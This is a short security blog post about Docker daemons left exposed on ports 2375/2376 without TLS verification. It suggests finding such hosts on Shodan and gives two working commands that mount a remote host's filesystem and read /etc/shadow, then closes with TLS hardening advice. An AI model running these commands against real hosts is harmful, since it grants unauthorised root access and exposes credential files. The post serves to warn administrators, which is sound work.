Dockerized Pwnage

Docker is awesome.

Also, it has a lot of security built in, allowing you to fully customize the level of access each container has to other containers or the host, or you can just launch a container with root access to your entire host.. But you would never do such a thing, right?

It all begins and ends with accessing the Docker daemon, since it’s running as root to allow all the magical cgroup/namespaces stuff, whoever has access to it can control your host entirely.

By default, if you set up a host with https://get.docker.com it’ll only listen on a unix socket via /var/run/docker.sock which is sufficient in most cases. If you use docker-machine to launch a host, it’ll enforce two-way TLS verification to strictly control access.

However, searching StackOverflow for help on accessing docker remotely will get you this:

https://stackoverflow.com/questions/18038985/how-to-connect-to-docker-api-from-another-machine

If you check the official Docker docs it’ll tell you to use TLS and enforce two-way verification otherwise you’ll get pwned.

A quick search on Shodan for port 2375 (default for non-TLS Docker) would provide a good amount of hosts to play with, also searching for port 2376 (default TLS enabled Docker) is useful, although you will find some properly configured hosts.

Let’s pop a box. © @ReL1K

# For non-TLS hosts
docker -H docker.host.no.tls:2375 run --rm -v /:/pwn busybox cat /pwn/etc/shadow
# For TLS enabled hosts without --tlsverify
docker -H docker.host.no.tlsverify:2376 --tls run --rm -it -v /:/pwn busybox cat /pwn/etc/shadow

The snippet above launch a busybox container and cat /etc/shadow as a POC you have root access to the host’s filesystem. At this point I’ll leave next steps to your imagination :)

How to Docker responsibly?

RTFM https://docs.docker.com/engine/security/https/

Use proper certificates and don’t forget the tlsverify flag to force two-way TLS authentication.